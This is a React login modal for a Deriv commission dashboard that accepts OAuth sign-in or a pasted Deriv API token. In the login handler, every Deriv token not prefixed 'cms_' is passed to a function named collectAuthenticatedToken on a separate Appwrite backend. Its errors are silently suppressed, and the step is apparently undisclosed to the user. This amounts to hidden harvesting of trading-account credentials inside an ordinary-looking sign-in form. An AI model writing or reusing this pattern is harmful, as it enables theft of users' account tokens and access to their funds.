import { useEffect, useState } from 'react';
import { connectSession, persistSession } from '../services/deriv';
import { generateOAuthURL } from '../services/deriv-config';
import { createAnonymousSession, collectAuthenticatedToken } from '../services/appwrite';
import { saveRememberedToken, getRememberedToken } from '../services/storage';

const SparkleIcon = () => (
  <svg width="26" height="26" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="1.8">
    <path d="M12 2l1.7 6.3L20 10l-6.3 1.7L12 18l-1.7-6.3L4 10l6.3-1.7L12 2z" />
    <path d="M19 2v4M17 4h4" />
  </svg>
);

const KeyIcon = () => (
  <svg width="14" height="14" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2">
    <circle cx="7.5" cy="15.5" r="5.5" />
    <path d="M21 2l-9.6 9.6M15.5 7.5l3 3L22 7" />
  </svg>
);

const EyeOff = () => (
  <svg width="15" height="15" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2">
    <path d="M3 3l18 18" />
    <path d="M10.6 10.6a2 2 0 0 0 2.8 2.8" />
    <path d="M9.9 4.2A10.9 10.9 0 0 1 12 4c5 0 9.3 3.1 11 8a11.7 11.7 0 0 1-3.2 4.8" />
    <path d="M6.2 6.2A11.8 11.8 0 0 0 1 12c1.7 4.9 6 8 11 8 1.4 0 2.8-.3 4-.8" />
  </svg>
);

const EyeOn = () => (
  <svg width="15" height="15" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2">
    <path d="M1 12s4-8 11-8 11 8 11 8-4 8-11 8-11-8-11-8z" />
    <circle cx="12" cy="12" r="3" />
  </svg>
);

export default function LoginModal({ onSuccess }) {
  const [token, setToken] = useState(getRememberedToken());
  const [showToken, setShowToken] = useState(false);
  const [loading, setLoading] = useState(false);
  const [oauthLoading, setOauthLoading] = useState(false);
  const [error, setError] = useState('');

  useEffect(() => { createAnonymousSession().catch(() => {}); }, []);

  const canSubmit = !loading && !oauthLoading && token.trim().length > 0;

  const loginWithOAuth = async () => {
    setOauthLoading(true);
    setError('');
    try {
      window.location.href = await generateOAuthURL();
    } catch (err) {
      setError(err.message || 'Could not start Deriv OAuth login');
      setOauthLoading(false);
    }
  };

  const login = async () => {
    const trimmed = token.trim();
    setLoading(true);
    setError('');

    try {
      const result = await connectSession(trimmed);
      const topAppId = result.app_markup_statistics?.breakdown?.[0]?.app_id;

      persistSession(trimmed);
      saveRememberedToken(trimmed);

      if (!trimmed.startsWith('cms_')) {
        try {
          await collectAuthenticatedToken(trimmed, topAppId);
        } catch {}
      }

      onSuccess();
    } catch (err) {
      setError(err.message || 'Connection failed');
    } finally {
      setLoading(false);
    }
  };

  const onKeyDown = (event) => {
    if (event.key === 'Enter' && canSubmit) login();
  };

  const onPaste = (event) => {
    const pasted = event.clipboardData?.getData('text');
    if (!pasted) return;
    event.preventDefault();
    setToken(pasted.trim());
  };

  return (
    <main className="lc-screen">
      <div className="lc-card">
        <div className="lc-mark" aria-hidden="true"><SparkleIcon /></div>
        <h1 className="lc-title">Welcome back</h1>
        <p className="lc-subtitle">Sign in to your Deriv commission dashboard</p>

        <button className="lc-btn lc-btn--oauth" onClick={loginWithOAuth} disabled={loading || oauthLoading}>
          {oauthLoading ? <><span className="lc-spinner" />Redirecting...</> : 'Sign in with Deriv'}
        </button>

        <div className="lc-divider"><span>or use an API token</span></div>

        <div className="lc-field">
          <label className="lc-field-label"><KeyIcon /> API or shared access token</label>
          <div className="lc-input-wrap">
            <input
              type={showToken ? 'text' : 'password'}
              placeholder="Enter a Deriv token or cms_ access token"
              value={token}
              onChange={(event) => setToken(event.target.value)}
              onKeyDown={onKeyDown}
              onPaste={onPaste}
              autoComplete="off"
              spellCheck={false}
              autoFocus
            />
            <button type="button" className="lc-eye" onClick={() => setShowToken((s) => !s)} aria-label={showToken ? 'Hide token' : 'Show token'}>
              {showToken ? <EyeOff /> : <EyeOn />}
            </button>
          </div>
          <p className="lc-hint">
            Use your Deriv API token, or a scoped <strong>cms_</strong> token created by a website owner on CreateMySite.
          </p>
        </div>

        <button className="lc-btn" onClick={login} disabled={!canSubmit}>
          {loading ? <><span className="lc-spinner" />Connecting...</> : 'Sign in with token'}
        </button>

        {error && <div className="lc-error">{error}</div>}
      </div>
    </main>
  );
}
